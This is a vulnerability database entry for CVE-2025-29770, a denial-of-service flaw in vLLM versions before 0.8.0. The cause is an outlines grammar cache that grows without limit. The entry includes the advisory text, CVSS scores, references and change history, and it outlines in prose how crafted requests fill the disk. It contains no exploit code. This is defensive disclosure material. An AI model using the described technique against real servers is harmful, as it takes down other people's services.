6.5
MEDIUM
CVE-2025-29770
OpenAI vLLM Outlines Cache Denial of Service Vulnerability
Description

vLLM is a high-throughput and memory-efficient inference and serving engine for LLMs. The outlines library is one of the backends used by vLLM to support structured output (a.k.a. guided decoding). Outlines provides an optional cache for its compiled grammars on the local filesystem. This cache has been on by default in vLLM. Outlines is also available by default through the OpenAI compatible API server. The affected code in vLLM is vllm/model_executor/guided_decoding/outlines_logits_processors.py, which unconditionally uses the cache from outlines. A malicious user can send a stream of very short decoding requests with unique schemas, resulting in an addition to the cache for each request. This can result in a Denial of Service if the filesystem runs out of space. Note that even if vLLM was configured to use a different backend by default, it is still possible to choose outlines on a per-request basis using the guided_decoding_backend key of the extra_body field of the request. This issue applies only to the V0 engine and is fixed in 0.8.0.

INFO

Published Date :

March 19, 2025, 4:15 p.m.

Last Modified :

July 31, 2025, 3:58 p.m.

Remotely Exploitable :

Yes !

Impact Score :

3.6

Exploitability Score :

2.8
Affected Products

The following products are affected by CVE-2025-29770 vulnerability. Even if cvefeed.io is aware of the exact versions of the products that are affected, the information is not represented in the table below.

ID Vendor Product Action
1 Vllm vllm
References to Advisories, Solutions, and Tools

Here, you will find a curated list of external links that provide in-depth information, practical solutions, and valuable tools related to CVE-2025-29770.

URL Resource
https://github.com/vllm-project/vllm/blob/53be4a863486d02bd96a59c674bbec23eec508f6/vllm/model_executor/guided_decoding/outlines_logits_processors.py Product
https://github.com/vllm-project/vllm/pull/14837 Issue Tracking Patch
https://github.com/vllm-project/vllm/security/advisories/GHSA-mgrm-fgjv-mhv8 Vendor Advisory Patch

We scan GitHub repositories to detect new proof-of-concept exploits. Following list is a collection of public exploits and proof-of-concepts, which have been published on GitHub (sorted by the most recently updated).

Results are limited to the first 15 repositories due to potential performance issues.

The following list is the news that have been mention CVE-2025-29770 vulnerability anywhere in the article.

The following table lists the changes that have been made to the CVE-2025-29770 vulnerability over time.

Vulnerability history details can be useful for understanding the evolution of a vulnerability, and for identifying the most recent changes that may impact the vulnerability's severity, exploitability, or other characteristics.

  • Initial Analysis by [email protected]

    Jul. 31, 2025

    Action Type Old Value New Value
    Added CPE Configuration OR *cpe:2.3:a:vllm:vllm:*:*:*:*:*:*:*:* versions up to (excluding) 0.8.0
    Added Reference Type GitHub, Inc.: https://github.com/vllm-project/vllm/blob/53be4a863486d02bd96a59c674bbec23eec508f6/vllm/model_executor/guided_decoding/outlines_logits_processors.py Types: Product
    Added Reference Type GitHub, Inc.: https://github.com/vllm-project/vllm/pull/14837 Types: Issue Tracking, Patch
    Added Reference Type GitHub, Inc.: https://github.com/vllm-project/vllm/security/advisories/GHSA-mgrm-fgjv-mhv8 Types: Patch, Vendor Advisory
  • New CVE Received by [email protected]

    Mar. 19, 2025

    Action Type Old Value New Value
    Added Description vLLM is a high-throughput and memory-efficient inference and serving engine for LLMs. The outlines library is one of the backends used by vLLM to support structured output (a.k.a. guided decoding). Outlines provides an optional cache for its compiled grammars on the local filesystem. This cache has been on by default in vLLM. Outlines is also available by default through the OpenAI compatible API server. The affected code in vLLM is vllm/model_executor/guided_decoding/outlines_logits_processors.py, which unconditionally uses the cache from outlines. A malicious user can send a stream of very short decoding requests with unique schemas, resulting in an addition to the cache for each request. This can result in a Denial of Service if the filesystem runs out of space. Note that even if vLLM was configured to use a different backend by default, it is still possible to choose outlines on a per-request basis using the guided_decoding_backend key of the extra_body field of the request. This issue applies only to the V0 engine and is fixed in 0.8.0.
    Added CVSS V3.1 AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
    Added CWE CWE-770
    Added Reference https://github.com/vllm-project/vllm/blob/53be4a863486d02bd96a59c674bbec23eec508f6/vllm/model_executor/guided_decoding/outlines_logits_processors.py
    Added Reference https://github.com/vllm-project/vllm/pull/14837
    Added Reference https://github.com/vllm-project/vllm/security/advisories/GHSA-mgrm-fgjv-mhv8
EPSS is a daily estimate of the probability of exploitation activity being observed over the next 30 days. Following chart shows the EPSS score history of the vulnerability.
CWE - Common Weakness Enumeration

While CVE identifies specific instances of vulnerabilities, CWE categorizes the common flaws or weaknesses that can lead to vulnerabilities. CVE-2025-29770 is associated with the following CWEs:

CVSS31 - Vulnerability Scoring System
Attack Vector
Attack Complexity
Privileges Required
User Interaction
Scope
Confidentiality
Integrity
Availability